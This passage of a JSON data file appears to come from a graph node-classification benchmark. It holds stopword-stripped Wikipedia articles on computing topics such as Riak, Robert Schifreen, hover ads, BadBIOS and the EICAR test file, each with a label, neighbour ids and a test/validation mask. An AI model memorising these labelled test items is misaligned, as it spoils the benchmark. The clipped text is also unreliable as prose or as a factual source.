    "text": "Qstack:qstack qstack cloud management platform developed greenqloud cloud computing software company founded reykjavik iceland february 2010 qstack enables users manage multiple clouds hybrid deployments single self-service portal qstack continuous development incorporating developments within infrastructure cloud application management solutions next release qstack slated june 2017 2014 jonsi stefansson joined ceo greenqloud pivoted operational focus development qstack beta launch fall 2015 began offering support technical services certifications software qstack hypervisor agnostic kvm vmware hyper-v manage private clouds multiple locations well aws azure ec2-compatible public clouds user interface qstack combines proprietary software open-source components company claims harden meet strict security standards often required enterprise deployments qstack features vm templates windows linux operating systems also features full ssh/rdp access instances virtual routers firewalls load balancers built interface 2015 review idg columnist j. peter bruzzese praised qstack ’ user interface ease-of-use clean look",
    "neighbors": [
      9655,
      6153,
      5770,
      6797,
      1935,
      7248,
      7983,
      9684,
      823,
      8439
    ],
    "mask": "Test"
  },
  {
    "node_id": 19,
    "label": 7,
    "text": "Riak:riak riak pronounced ree-ack distributed nosql key-value data store offers high availability fault tolerance operational simplicity scalability addition open-source version comes supported enterprise version cloud storage version riak implements principles amazon dynamo paper heavy influence cap theorem written erlang riak fault tolerant data replication automatic data distribution across cluster performance resilience riak licensed using freemium model open source versions riak riak cs available end users pay additional features support riak pluggable backend core storage default storage backend bitcask leveldb also supported riak available free apache 2 license addition basho technologies offered two options commercial software riak enterprise riak enterprise plus riak enterprise plus adds baseline annual system health checks ensure long-term platform stability performance riak official drivers ruby java erlang python also numerous community-supported drivers programming languages riak originally written andy gross others basho technologies power web sales force automation application former engineers executives akamai interest datastore technology applications built company decided build business around riak gaining adoption throughout fortune 100 becoming foundation many world fastest-growing web-based mobile social networking applications well cloud service providers releases graduation include notable users include comcast github best buy uk national health services nhs weather channel riot games",
    "neighbors": [
      11136,
      5380,
      3462,
      5139,
      9245,
      6433,
      5034,
      10924,
      5677,
      7983,
      7347,
      823,
      5560,
      9151,
      9152,
      11201,
      6851,
      8008,
      11595,
      11343,
      11221,
      8408,
      8170,
      8554,
      5356,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 20,
    "label": 4,
    "text": "S21Sec:s21sec s21sec cybersecurity company s21sec offers various security-related services e.g protection critical infrastructures personal data protection software e.g information security management systems s21sec focused providing security governs energy critical infrastructures finance institutions telco industries s21sec cert section 24-hour security intelligence center cybercrime one collaborates governs governmental institutions like europool fbi 20 dow jones eurostoxx 50 companies clients s21sec late 2014 portugal-based sonae bought 60 s21sec",
    "neighbors": [
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 21,
    "label": 4,
    "text": "Robert_Schifreen:robert schifreen robert jonathan schifreen born october 1963 former uk-based computer hacker magazine editor founder security awareness training programme securitysmart.co.uk first person charged illegally accessing computer system acquitted specific criminal offence time later life became computer security consultant speaking many conferences information security training banks large companies universities uk security 2014 began developing software securitysmart runs scratch reached completion product launch june 2016 idea securitysmart.co.uk came robert speaking many cisos conferences repeatedly hearing biggest problem traditional methods security training lacked tangible way measuring success securitysmart micro-learning platform sends email week trainees one security-related topic ending multiple choice question test trainee understanding managers access dashboard contains analytics related trainee response training emails including opened long took answer question regularly got answers right arrested 1985 hacking british telecom computer accessing telecom gold emails prince philip specific law hacking time june 1985 became together co-defendant steve gold one first two people charged section 1 forgery counterfeiting act 1981 forgery deceived non-human target case came trial april 1986 schifreen said used unprotected top level account identified 2222222222 password 1234 schifreen said admitted obtaining user passwords denied personal gain said activities prompted prestel increase security 24 april 1986 schifreen convicted six counts forgery fined £750 schifreen appeal court appeal heard three judges including lord chief justice lord lane judgment given 21 july 1987 found use charge forgery inappropriate application charges dismissed giving case answer succeed judgment expressed hope procrustean attempt force facts language act designed fit would repeated crown appealed house lords r v gold schifreen hl 21 apr 1988 appeal turned april 1988 law lords agreed making false instrument key part proving forgery case revolved around production memory segment false information computer created rather schifreen computer effectively forged case led introduction computer misuse act 1990 acquittal schifreen take judicial review action police return computers years schifreen editor .exe magazine magazine programmers 'hex online name shortened punning 'hex maniac active cixen late 1980s time online communities still rare novelty schifreen lives east sussex working security trainer web developer university brighton runs security consultancy regularly speaks conferences writes articles computer press publications 2006 john wiley sons published book defeating hacker",
    "neighbors": [
      10110
    ],
    "mask": "None"
  },
  {
    "node_id": 22,
    "label": 9,
    "text": "Locomotive_BASIC:locomotive basic locomotive basic proprietary dialect basic programming language written locomotive software amstrad cpc built-in rom also gem application amstrad pc1512 1640 main ancestor mallard basic interpreter cp/m supplied amstrad pcw two versions locomotive basic 1.0 came cpc model 464 1.1 shipped versions special update—or rather rom extension—was available amstrad cpc plus series machines added specialised basic commands taking advantage extra capabilities machines development based existing work recently undertaken writing mallard basic acorn computers z80 addon bbc micro reported taken around 12 weeks enhance existing code influenced bbc basic though adding additional functions things would required assembly language bbc rather simple powerful basic implementation standards day featuring dedicated commands handling graphics draw plot ink paper versions plus fill v1.1 even allowing creation multiple screens windows like although color system palette handling awkward table giving numeric codes 27 system colors printed built-in 3 disk drive casing 664 later machines simple stand however among basics time offering timer-based software interrupt mechanism using every commands offered timed repeating once-off call respectively basic line number choice also compared home computers time amstrad via locomotive basic granted relatively high level control cpc sound chip ay-3-8912 3 melodic channels 1 noise channel chip also used late-model zx spectrums well atari st msx computers none complete built-in sound command many things selecting particular channel combination channels setting envelopes volume pitch noise could done single sound command 7 parameters granted especially complex and/or low-level techniques could done basic due requiring precise direct access hardware e.g especially complex music trackers including simulated chords using arpeggios etc playback digitally sampled sounds game robocop example disk tape file management managed basic usually good enough simple file management commands get put erase save merge run cat load etc fact years basic supplied standard every low-cost home computer also acted less simple operating system also available special commands memory allocation handling like memory parametric load command allowing example load file containing raw picture data video memory causing displayed couple basic instructions adding right memory address es parameter commands load save would allow easy loading raw uncompressed 16 kb screen pictures calling another address gave forced system reset call 0 famous press key call bb18 eliminating flicker animation allowing synchronize monitor raster scan via sync frame-flyback call bd19 given dedicated command basic 1.1 frame peek poke call provided interface assembly language programming basic locomotive basic compared commodore 64 basic commodore basic dedicated commands graphics sound allowed pretty much anything within standard capabilities machine unimportant machines era using full graphics sound limited assembler programmers msx spectrum others offered similar less complete command set sound graphics capabilities things going clearly beyond basic capabilities overscan modes used games demos 27-color graphics modes digital sound playback smooth scrolling unlike sinclair basic commodore 64 basic various keyboard command shortcuts specialized keys choosing symbols colors locomotive basic keywords typed full interpreter parsed recognized tokenised however abbreviations like print shortcuts programs could saved onto cassette tape floppy disk retrieved binary ascii files",
    "neighbors": [
      3718,
      1673,
      7691,
      1805,
      9997,
      786,
      11412,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      689,
      7983,
      9006,
      11315,
      4409,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      1879,
      92,
      477,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 23,
    "label": 5,
    "text": "Delay-gradient_congestion_control:delay-gradient congestion control computer networking delay-gradient congestion control refers class congestion control algorithms react differences round-trip delay time rtt opposed classical congestion control methods react packet loss rtt threshold exceeded algorithms include caia delay-gradient cdg timely",
    "neighbors": [
      7017,
      23
    ],
    "mask": "None"
  },
  {
    "node_id": 24,
    "label": 4,
    "text": "Hover_ad:hover ad hover ads commonly called in-page pop-ups special type pop-up ads created using dynamic html javascript similar web browser technologies scroll web page appear hover page usually obscuring content pop-up ads acquired certain share online advertising solutions technologies first internet pop-ups created using codice_1 javascript function opens new browser window advertising content presented window html content loaded web address pop-ups easily blocked pop-up blockers google toolbar could downloaded cost order circumvent pop-up blockers online advertisers tried different method opening pop-ups dynamic html integral functioning web-browser thus harder block hover ads developed around several web browser technologies center realization utilized dhtml technique javascript modifies content page using javascript certain levels objects browser ’ dom manipulated produce window-like visual dhtml elements representing hover ads hover ad windows basic attribute used css html element attribute — position modern browsers implement cascading style sheets order separate presentation content css technology also enables javascript content web page programmatically manipulate css attributes various html elements constituting web page content first movable html elements introduced netscape communicator now-deprecated layer technology hover ads tend hard block pop-up blocking software hover ad window integral part html content web page thus software filtering content algorithmic means recognizing removing parts content either descriptive procedural create populate manipulate hover ad window",
    "neighbors": [
      2611,
      444,
      3462,
      8923
    ],
    "mask": "None"
  },
  {
    "node_id": 25,
    "label": 2,
    "text": "NOS_(software):nos software nos network operating system discontinued operating system time-sharing capabilities written control data corporation 1970s nos ran 60-bit cdc 6000 series mainframe computers successors nos replaced earlier cdc kronos operating system 1970s nos intended sole operating system cdc machines fact cdc promoted heavily nos replaced nos/ve 64-bit cyber-180 systems mid-1980s version 1 nos continued updated 1981 nos version 2 released early 1982 nos version 1 terminal user instant manual cdc 1975-1980",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      10776,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      6221,
      3160,
      11356,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      7382,
      8410,
      10458,
      9436,
      1247,
      11489,
      1253,
      7403,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      5435,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      1902,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      6529,
      10113,
      8069,
      4998,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      3007,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      2519,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "Validation"
  },
  {
    "node_id": 26,
    "label": 3,
    "text": "System_Service_Processor:system service processor system service processor often abbreviated ssp sparc-based computer used control sun microsystems enterprise 10000 platform term ssp often used describe computer hardware software necessary accomplish task system service processor software provided following functionality several utilities provided ssp software packages including hostview program provided x window system interface platform maintenance several cli programs normally two system service processors used per platform one configured main spare ssp role main could control platform given time failover main spare performed automatically ssp software following systems supported use system service processors",
    "neighbors": [
      9665,
      9731,
      3247,
      11440,
      1399,
      5531,
      4444
    ],
    "mask": "None"
  },
  {
    "node_id": 27,
    "label": 3,
    "text": "Branch_target_predictor:branch target predictor computer architecture branch target predictor part processor predicts target taken conditional branch unconditional branch instruction target branch instruction computed execution unit processor branch target prediction branch prediction attempts guess whether conditional branch taken not-taken i.e. binary parallel processor designs instruction cache latency grows longer fetch width grows wider branch target extraction becomes bottleneck recurrence machines recurrence takes two cycles machine loses one full cycle fetch every predicted taken branch predicted branches happen every 10 instructions force substantial drop fetch bandwidth machines longer instruction cache latencies would even larger loss ameliorate loss machines implement branch target prediction given address branch predict target branch refinement idea predicts start sequential run instructions given address start previous sequential run instructions predictor reduces recurrence predictor ram 5–10 size instruction cache fetch happens much faster instruction cache fetch recurrence much faster fast enough could parallelized predicting target addresses target branches",
    "neighbors": [
      6339,
      6181,
      8231,
      7852,
      6924,
      9932,
      10796,
      10746
    ],
    "mask": "Test"
  },
  {
    "node_id": 28,
    "label": 4,
    "text": "BadBIOS:badbios badbios alleged advanced persistent threat reported network security researcher dragos ruiu october 2013 ability communicate instances across air gaps using ultrasonic communication computer speakers microphone date proven occurrences malware ruiu claims virus able infect bios computers running windows mac os x bsd linux well spread infection usb flash drives rob graham errata security produced detailed analysis element claims badbios capabilities describing software plausible whereas paul ducklin sophos naked security blog suggested possible course elaborate hoax ruiu posted data dumps supposedly demonstrated existence virus signs maliciousness found normal expected data december 2013 computer scientists michael hanspach michael goetz released paper journal communication demonstrating possibility acoustic mesh networking slow 20 bits per second using set speakers microphones ultrasonic communication fashion similar badbios described abilities",
    "neighbors": [
      939,
      1515,
      823,
      7127,
      7515,
      8574,
      9055
    ],
    "mask": "None"
  },
  {
    "node_id": 29,
    "label": 6,
    "text": "Dancing_tree:dancing tree computer science dancing tree tree data structure similar b+ trees invented hans reiser use reiser4 file system opposed self-balancing binary search trees attempt keep nodes balanced times dancing trees balance nodes flushing data disk either memory constraints transaction completed idea behind speed file system operations delaying optimization tree writing disk necessary writing disk thousands times slower writing memory also optimization done less often tree data structures optimization extensive sense considered self-balancing binary search tree optimized storage slow medium on-disc form always balanced get mid-transaction writes eases difficulty time adding removing nodes instead performs slow rebalancing operations time much slower write storage medium however negative side effect behavior witnessed cases unexpected shutdown incomplete data writes occurrences may prevent final balanced transaction completing general dancing trees pose greater difficulty data recovery incomplete transactions normal tree though addressed either adding extra transaction logs developing algorithm locate data disk previously present going optimizations continuing pending operations/transactions",
    "neighbors": [
      1801,
      7070
    ],
    "mask": "None"
  },
  {
    "node_id": 30,
    "label": 4,
    "text": "Information_Card_Foundation:information card foundation june 2008 independent non-profit organization information card foundation icf created icf consists steering community board members steering business board members businesses include equifax google microsoft novell oracle corporation paypal foundation created information card digital identification card prove purpose information card supply certified proof online merchants businesses aid identity protection user",
    "neighbors": [
      4435,
      11021,
      2558,
      8807
    ],
    "mask": "Test"
  },
  {
    "node_id": 31,
    "label": 9,
    "text": "Inline_caching:inline caching inline caching optimization technique employed language runtimes first developed smalltalk goal inline caching speed runtime method binding remembering results previous method lookup directly call site inline caching especially useful dynamically typed languages method binding happens runtime virtual method tables often used following ecmascript function receives object invokes tostring-method displays results page script embedded since type object specified potential method overloading impossible decide ahead time concrete implementation tostring-method going invoked instead dynamic lookup performed runtime language runtimes employ form caching lookup performed every time method invoked methods may defined several steps inheritance chain dynamic lookup expensive operation achieve better performance many language runtimes employ form non-inline caching results limited number method lookups stored associative data structure greatly increase performance provided programs executed cache friendly i.e limited set methods invoked frequently data structure typically called first-level method lookup cache concept inline caching based empirical observation objects occur particular call site often type cases performance increased greatly storing result method lookup inline i.e directly call site facilitate process call sites assigned different states initially call site considered uninitialized language runtime reaches particular uninitialized call site performs dynamic lookup stores result call site changes state monomorphic language runtime reaches call site retrieves callee invokes directly without performing lookups account possibility objects different types may occur call site language runtime also insert guard conditions code commonly inserted preamble callee rather call site better exploit branch prediction save space due one copy preamble versus multiple copies call site call site monomorphic state encounters type one expects change back uninitialized state perform full dynamic lookup canonical implementation register load constant followed call instruction uninitialized state better called unlinked register loaded message selector typically address object call run-time routine look-up message class current receiver using first-level method lookup cache run-time routine rewrites instructions changing load instruction load register type current receiver call instruction call preamble target method linking call site target method execution continues immediately following preamble subsequent execution call preamble directly preamble derives type current receiver compares register agree receiver type method continues execute preamble calls run-time various strategies possible one relink call-site new receiver type performance gains come one type comparison instead least type comparison selector comparison first-level method lookup cache using direct call benefit instruction prefetch pipe-lining opposed indirect call method-lookup vtable dispatch particular call site frequently sees different types objects performance benefits inline caching easily nullified overhead induced frequent changes state call site following example constitutes worst-case scenario monomorphic inline caching method tostring invoked object whose type known advance importantly though type object changes every iteration surrounding loop naive implementation monomorphic inline caching would therefore constantly cycle uninitialized monomorphic states order prevent happening implementations monomorphic inline caching support third state often referred megamorphic state state entered particular call site seen predetermined number different types call site entered megamorphic state behave uninitialized state exception enter monomorphic state ever implementations monomorphic inline caching change megamorphic call sites back uninitialized certain amount time passed full garbage collection cycle performed better deal call sites frequently see limited number different types language runtimes employ technique called polymorphic inline caching polymorphic inline caching call site monomorphic state sees second type rather reverting uninitialized state switches new state called polymorphic polymorphic call site decides limited set known methods invoke based type currently presented words polymorphic inline caching multiple method lookup results recorded call site every call site program potentially see every type system usually upper bound many lookup results recorded call site upper bound reached call sites become megamorphic inline caching performed canonical implementation jump table consists preamble derives type receiver series constant compares conditional jumps jump code following preamble relevant method receiver type jump table typically allocated particular call-site monomorphic call-site encounters different type jump-table fixed size able grow adding cases new types encountered small maximum number cases 4 6 8 reaches maximum size execution new receiver type fall-off end enter run-time typically perform method lookup starting first-level method cache observation together monomorphic polymorphic inline caches collect per-call-site receiver type information side-effect optimizing program execution led development adaptive optimization self run-time optimizes hot spots program using type information inline caches guide speculative inlining decisions run-time uses monomorphic polymorphic inline caching steady state unlinked sends occurring sends falling-off ends polymorphic inline caches since sends slow profitable optimize sites megamorphic inline cache implemented creating code perform first-level method lookup particular call-site scheme send falls-off end polymorphic inline cache megamorphic cache specific call site selector created shared one already exists send site relinked call code significantly efficient normal first-level method lookup probe since selector constant decreases register pressure code lookup dispatch executed without calling run-time dispatch benefit branch prediction empirical measurements show large smalltalk programs 1/3 send sites active methods remain unlinked remaining 2/3 90 monomorphic 9 polymorphic 1 0.9 megamorphic",
    "neighbors": [
      2304,
      1409,
      9152,
      8231,
      3413,
      8854,
      2620
    ],
    "mask": "Test"
  },
  {
    "node_id": 32,
    "label": 2,
    "text": "CCID_(protocol):ccid protocol ccid chip card interface device protocol usb protocol allows smartcard connected computer via card reader using standard usb interface without need manufacturer smartcards provide reader protocol allows smartcard used security token authentication data encryption used bitlocker chip card interface devices come variety forms smallest ccid form standard usb dongle may contain sim card secure digital card inside usb dongle another popular device usb smart card reader keyboard addition standard pc usb keyboard additional slot accepting smartcard according ccid specification usb standards work group ccid exchanges information host computer usb using ccid message consists 10-byte header followed message-specific data standard defines fourteen commands host computer use send data status control information messages every command requires least one response message ccid ccid driver support natively supported windows operating system windows 2000 linux unices ccid ct-api devices usually accessed user-space drivers special kernel adaptation required",
    "neighbors": [
      8865,
      10566,
      10801,
      9745,
      7327
    ],
    "mask": "Test"
  },
  {
    "node_id": 33,
    "label": 3,
    "text": "Psychic_World:psychic world psychic world platform game wherein player character lucía runs one stage using esp booster blast monstrous enemies obtaining item power-ups jumping various ledges platforms booster gauge often certain items abilities used health replenished power-ups weapons upgradeable merely picking item particular weapon new weapons obtained mini-bosses end-level bosses player use lucia psionic weapons strategically levels using different elements advantage ice stage rocks doused falling water frozen used stable platform lucía jump blasting rock ice shot sonic wave weapon destroy certain foreground objects blocking path taking place remote laboratory year 19xx three-staff research team consisting dr. knavik assistants twin sisters cecile lucia studying exploration usage esp one day lucia getting ready work explosion burst lab time lucia got dr. knavik right cecile disappeared dr. knavik explains part experiments involved running tests variety monsters eventually subjects rebelled took cecile lucia follows monster track dr. knavik gives esp booster device created enable user wield psychic powers psychic world master system given mixed mostly positive reviews 70 raze 69 video games game gear version received score 83 joystick",
    "neighbors": [
      10931
    ],
    "mask": "Test"
  },
  {
    "node_id": 34,
    "label": 4,
    "text": "Cygilant:cygilant cygilant inc originally named eiq networks inc. boston-based security software-as-a-service saas company focused information security compliance objectives eiq networks ’ origins analysis log files across web servers file servers firewalls network devices moved security information event management siem market eiq networks inc. founded 2001 eiq networks ’ global headquarters boston massachusetts additional hyderabad india eiq networks closely held private company company completed first institutional round raising 10 million january 2009 led venrock company received additional 2 million september 2010 also raised 750,000 debt financing june 2012 santa monica-based arrowroot capital invested eiq networks 2014 company since experienced substantially higher growth rates driven ramp-up company inside sales organization eiq networks co-founded vijay basani jay reddy september 2017 company announced raised additional 7 million funding would rebrand cygilant inc prior founding eiq networks basani reddy co-founded webmanage technologies acquired netapp 2000 feb. 8th 2018 company mocked insulted several security researchers twitter also tweeted thanks free marketing kids howyoudomarketing later tweets deleted company apologized",
    "neighbors": [
      11611,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 35,
    "label": 5,
    "text": "Geo_URI_scheme:geo uri scheme geo uri scheme uniform resource identifier uri scheme defined internet engineering task force rfc 5870 published 8 june 2010 uniform resource identifier uri geographic locations using 'geo scheme name 'geo uri identifies physical location two- three-dimensional coordinate reference system compact simple human-readable protocol-independent way current revision vcard specification supports geo uris vcard geo property geosms standard uses geo uris geotagging sms messages android based devices support geo uris although implementation based draft revision specification supports different set uri parameters query strings geo uri confused site geourl implements icbm address simple geo uri might look like two numerical values represent latitude longitude respectively separated comma coordinates horizontal grid 2d third comma-separated value present represents altitude coordinates 3d grid coordinates southern western hemispheres well altitudes coordinate reference system depths signed negative leading dash geo uri also allows optional uncertainty value separated semicolon representing uncertainty location meters described using u uri parameter geo uri uncertainty parameter looks follows geo uri may example included web page html geo uri-aware user agent web browser could launch user chosen mapping service could used atom feed xml file values coordinates make sense coordinate reference system crs specified default crs world geodetic system 1984 wgs-84 recommended use justified use crs today perhaps preserve projection large-scale maps local utm non-terrestrial coordinates moon mars syntax semantic crs parameter separated semicolon described section 8.3 rfc 5870 examples order semicolon-separated parameters occur partially significant whilst labeltext parameter future parameters may given order codice_6 codice_7 parameters must come first used codice_6 must precede codice_7 parameters case-insensitive imagining future new parameter codice_10 ignored simpler applications example exactly equivalent doubt remember use lowercase representation parameter names codice_6 codice_7 codice_10 preferred geo uri scheme semantics expressed section 3.4 rfc 5870 explicit mathematical assumptions open interpretation ~10 years publication consensual frequently used assumptions syntax geo ui defines coodinates codice_15 coord-c optional semantic coord-c wgs-84 altitude specifically ground elevation relative current geoid attached wgs84 concept extend coordinates non-default crs rfc explains ... undefined altitude may assume uri refers respective location earth physical surface however ... altitude value 0 must mistaken refer 'ground elevation words altitude defined measurement done relative geoid 5 black line image surface defined earth gravity approximating mean sea level undefined elevation assumed altitude latitude-longitude point height negative depth relative geoid i.e ground elevation point measure altitude=0 however confused undefined value refers altitude 0 meters geoid geo uri exact abstract positions strictly location estimate interpret rfc 5870 rfc 5491 approximate physical position object earth surface rfc 5870 formalize use uncertainty term clues come citations normative reference something uncertainty rfc 5491 section 5 main informative reference iso 6709:2008 use term uncertainty use terms accuracy precision uncertainty facets interpreted accordance iso 5725-1 illustrated putting together adopting clues usual statistical assumptions explicit definitions rfc obtain geo uri uncertainty mathematical properties imagining location ant colony illustrate total uncertainty sum gps error object-definition error latitude longitude gps errors need simplified disk converted meters errors inferred different model need converted gaussian model vendors android os adopted extensions geo uri scheme android adopts unconventional approach parsing points show map pin point given normally map pin show given query words show pin wikimedia foundation office one use codice_16 codice_17",
    "neighbors": [
      10242,
      5251,
      3218,
      10269,
      6319,
      6330,
      4797,
      7364,
      2887,
      9167,
      479,
      10341,
      10727,
      11112,
      5482,
      9834,
      11509,
      3191,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 36,
    "label": 3,
    "text": "TurboSPARC:turbosparc turbosparc microprocessor implements sparc v8 instruction set architecture isa developed fujitsu microelectronics inc. fmi united states subsidiary japanese multinational information technology equipment services company fujitsu limited located san jose california low-end microprocessor primarily developed upgrade sun microsystems microsparc-ii-based sparcstation 5 workstation introduced 30 september 1996 170 mhz version priced us 499 quantities 1,000 turbosparc mostly succeeded low-end sparc market ultrasparc iii late 1997 remained available users turbosparc force computers fujitsu rdi computer opus systems tadpole technologies tatung science technology themis computers fujitsu used 160 mhz version sparcstation 5 upgrade kit whereas companies used 170 mhz version workstation notebook embedded computers performance 170 mhz turbosparc similar 120 mhz intel pentium compared 110 mhz microsparc-ii two times integer performance one half times floating-point performance turbosparc simple scalar in-order design fetch stage two instructions fetched 16 kb direct-mapped instruction cache decode stage one instruction decoded operands read register file execution began stage three turbosparc integer unit floating-point unit integer arithmetic instructions except multiply divide single-cycle latency multiply divide executed fpu multiply seven cycle latency divide 8- 33-cycle latency floating-point arithmetic instructions except divide square-root four-cycle latency memory access occurs stage four turbosparc 16 kb data cache cache direct-mapped uses write back write policy data cache hit data returned cycle checked errors stage five integer results loads written register file stage six floating-point instructions take cycles completed stage seven written floating-point register file stage eight turbosparc integrated controllers l2 cache memory afx interface sbus interface 256 kb 512 kb 1 mb external l2 cache supported cache operated half one-third internal clock frequency 85 56.67 mhz respectively 170 mhz direct-mapped 32-byte line size used write-through write policy parity protected cache built 12 ns pipelined burst static random access memory pbsram memory controller supported 8 256 mb fast page mode fpm dram eight banks l2 cache memory accessed using system bus 72-bit wide bus 64 bits data afx interface enabled afx graphics cards directly access memory shares data bus cache memory controllers used control lines sbus controller 16-entry input/output translation lookaside buffer turbosparc supported sbus frequencies 16.67 25 mhz turbosparc multiprocessor-capable turbosparc contained 3.0 million transistors measured 11.5 11.5 mm die area 132.25 mm fabricated fujitsu cs-60ale process 0.35 µm four-level metal complementary metal–oxide–semiconductor cmos process turbosparc packaged 416-ball plastic ball grid array pbga used 3.3 v power supply 9 w maximum power dissipation",
    "neighbors": [
      9920,
      9665,
      9955,
      9766,
      3431,
      1707,
      5358,
      1776,
      9137,
      11440,
      1461,
      10837,
      1399,
      10108,
      1503
    ],
    "mask": "None"
  },
  {
    "node_id": 37,
    "label": 4,
    "text": "EICAR_test_file:eicar test file eicar anti-virus test file eicar test file computer file developed european institute computer antivirus research eicar computer antivirus research organization caro test response computer antivirus av programs instead using real malware could cause real damage test file allows people test anti-virus software without use real computer virus anti-virus programmers set eicar string verified virus similar identified signatures compliant virus scanner detecting file respond less manner found harmful virus virus scanners compliant may detect file even correctly configured neither way file detected wording flagged standardized may differ way real malware flagged prevent executing long meets strict specification set european institute computer antivirus research use eicar test string versatile straightforward detection file containing eicar test string compressed archived antivirus software run see whether detect test string compressed file many amtso feature settings checks based eicar test string developers one anti-virus software malwarebytes said add eicar test file database adding fake malware test files like eicar database takes time away malware research proves nothing long run file text file 68 128 bytes legitimate executable file called com file run ms-dos work-alikes successors os/2 windows except 64-bit due 16-bit limitations executed eicar test file print eicar-standard-antivirus-test-file stop test string written noted anti-virus researchers padgett peterson paul ducklin engineered consist ascii human-readable characters easily created using standard computer keyboard makes use self-modifying code work around technical issues constraint imposes execution test string eicar test string reads note third character capital letter digit zero string hash values including trailing newline character follows",
    "neighbors": [
      898,
      11163,
      4294,
      6921,
      43,
      3342,
      5902,
      7856,
      9166,
      5971,
      11225,
      665,
      7739,
      2588
    ],
    "mask": "Validation"
  },
  {
    "node_id": 38,
    "label": 3,
    "text": "Sitara_ARM_Processor:sitara arm processor sitara arm processor family developed texas instruments features arm9 arm cortex-a8 arm cortex-a9 arm cortex-a15 arm cortex-a53 application cores c66x dsp cores immaging multimedia acceleration cores industrial communication ip technology serve broad base applications development using sitara processors supported open source beagle community well texas instruments open source development community sitara arm processors available today include",
    "neighbors": [
      7170,
      6670,
      8720,
      11282,
      9235,
      11289,
      1057,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      9928,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      9978,
      3835,
      2814,
      3847,
      781,
      5417,
      2862,
      7988,
      10548,
      11062,
      823,
      1849,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 39,
    "label": 7,
    "text": "Hybrid_Web_Cluster:hybrid web cluster hybrid web cluster software product developed hybrid logic ltd. bristol united kingdom based company software designed provide commodity web hosting distributed fault-tolerant manner cluster either real physical servers virtual cloud computing infrastructure server instances software splits website database individual units work load generated monitored closely cluster automatically transparently transfers websites databases cluster nodes single node ever overloaded single website go load requiring dedicated web database servers within seconds one server ever live particular website database one time enabling existing applications run un-modified would commodity shared web hosting upper bound scalability system single website ever utilise two servers condition standard lamp applications run unmodified however possible scale beyond limit via use multi-master database replication requires applications store variable state information within database database live many servers web application must remain static served many nodes cluster required possible specify redundancy invariant sets number machines cluster hold copy website database default number set 2 means normal operation data held least two cluster nodes one time cluster node fails system acts automatically recover data resume web hosting within 15 seconds achieved using filesystem snapshotting capabilities zfs hybrid web cluster began beta testing september 2010 hybridcluster 2.0 released 1 may 2013",
    "neighbors": [
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      6307,
      9766,
      5159,
      6444,
      7983,
      8495,
      3121,
      7352,
      2496,
      4289,
      1224,
      3784,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      7802,
      6999,
      7642,
      6367,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      2170,
      5499,
      253,
      8446,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 40,
    "label": 2,
    "text": "Nokia_N77:nokia n77 nokia n77 3g smartphone nokia introduced 12 february 2007 released june 2007 runs symbian 9.1 s60 3rd edition n77 specs somewhat basic compared nseries devices time included dvb-h television tuner stated nokia press release n77 designed low-cost mobile tv accelerate dvb-h adoption sporting candybar design similar n73 company second dvb-h device n92 though smaller screen n77 thus available limited dvb-h markets hard come",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 41,
    "label": 1,
